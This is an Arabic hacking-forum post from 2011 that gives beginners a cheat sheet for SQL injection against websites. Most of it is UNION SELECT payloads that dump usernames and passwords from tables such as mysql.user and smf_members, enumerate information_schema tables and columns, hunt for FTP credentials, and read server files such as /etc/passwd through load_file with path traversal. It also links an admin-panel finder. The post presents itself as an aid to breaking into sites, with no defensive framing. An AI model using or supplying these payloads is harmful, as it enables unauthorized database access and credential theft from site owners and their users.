حقن قواعد البيانات بثغرت SQL injection - منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team |

S4wDz · 20/07/2011, 17:49

بسـم اللــه الرحمــن الرحيــم

السلام عليكم اخواني الغاليين

مجموعه الكلمات المتحتمله التي تستخدم في حقن قواعد البيانات بثغرت SQL jnjection

وان شاء الله تفيدكم في الحقن وتكون مرجع للمبتدئين حتى يحفظون الاستغلال نبدأ على بركة الله

اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن

الرمز:
user & users & username & admin & adminlogim & login & member & membername

user_name

الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن

الرمز:password & pass & passwd & pwd

اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس

الرمز:
user
users
mysql.user
mysql.db
mysql.dbh
smf_members

ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن

الان مثلا اسم القاعده في الموقع هذي ( mysql.user ) لو نبغي نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل

الرمز:union+select+1,2,user,4,5+from+mysql.user

ونفس الاستغلال السابق لليوزر لو نبغي نستخرج باسورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل

الرمز:union+select+1,2,password,4,5+from+mysql.user

مثال اخر على الكلمات السابقه للتوضيع

الرمز:union+select+1,2,membername,4,5+from+smf_members

لاستخراج الجداول في قواعد البيانات وقت الحقن

الرمز:union+select+1,2,table_name,4,5+from+information_s chema.tables

لاستخراج الاعمده في قواحد البيانات وقت الحقن

الرمز:union+select+1,2,column_name,4,5+from+information_ schema.columns

الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل

طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً

الرمز:union+select+1,2,username,4,5+from+users+where+use rid=1/*

الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه

الرمز:load_file("/هنا الاوامر")

مثال على هذا

الرمز:union+select+1,load_file("/"),3,4+from+mysql.user

وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر

الرمز:union+select+1,load_file("/etc/passwd"),3,4+from+mysql.user

او نجرب هذا نفس الامر بس نتراجع للخلف

الرمز:union+select+1,load_file("/../../etc/passwd"),3,4+from+mysql.user

الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن

هذا الامر خاص بالبحث في الجداول

الرمز:union+select+1,2,table_name,4,5+from+information_s chema.tables+where+table_name+like+'%25ftp%25'/*

هذا الامر خاص بالبحث في الاعمده

الرمز:union+select+1,2,column_name,4,5+from+information_ schema.columns+where+column_name+like+'%25ftp%25'/*

FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ

الرمز:'%25ftp%25' <<< في هذا الامر

تقدر تكتب اللي تبيه كتخمين منك انت مثلا ftp تستطيع ان تخمن اللي تبيه مثلا بدال كامة

الرمز:'%25user%25' & '%25logim%25'

يعني حاول تخمن اكبر عدد من الكلمات المحتمله وحط في بالك ان كل سيرفر يختلف عن الثاني

ممكن في سيرفر تطلع معاك بيانات كثيره وسيرفر غيره مايطلع معاك شي عادي

موقع يبحث عن مسارات لوحه التحكم لاي سكربت

اكتب عنوان الموقع وبعدها علامه السلاش

تفضلو الموقع

http://www.code-balkan.com/adminpagefind.php/

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
تلغيم قواعد البيانات بشل ^_^	MdMn HaCk3r	[ مـنتدى حمايه المواقع والسيرفرات \| Hacking Site's & Servers ]	2	30/01/2011 08:30
{8}---{2}حقن قواعد البيانات اصدار 5 الوصول لعمود الباسورد{2}---{8}	ViRuS_Ra3cH	دورة اختراق المواقع والسيرفورات \| kala$nikov	0	18/03/2010 14:13
{7}---{1}حقن قواعد البيانات اصدار 5الدعسه الاولى{1}---{7}	ViRuS_Ra3cH	دورة اختراق المواقع والسيرفورات \| kala$nikov	0	18/03/2010 14:11
--{1} شرح اساسيات***65279; قواعد البيانات{1}--	ViRuS_Ra3cH	دورة اختراق المواقع والسيرفورات \| kala$nikov	1	18/03/2010 12:50
--{2} استعلامات قواعد البيانات {2}--	ViRuS_Ra3cH	دورة اختراق المواقع والسيرفورات \| kala$nikov	0	18/03/2010 12:49

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)

(أظهر الكل) الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 17
9lbi hacker , adelbm , Dz-Hat , ثائر الهوارين , Hackerz , kevin death , ma20030 , mbsoft , microsarme6943 , moja4ed_fz , MR.KaDeRoU , MrAchraf , سردينة2009 , S-japonia33 , S1LV3rS3rf3r , S4wDz , sami hack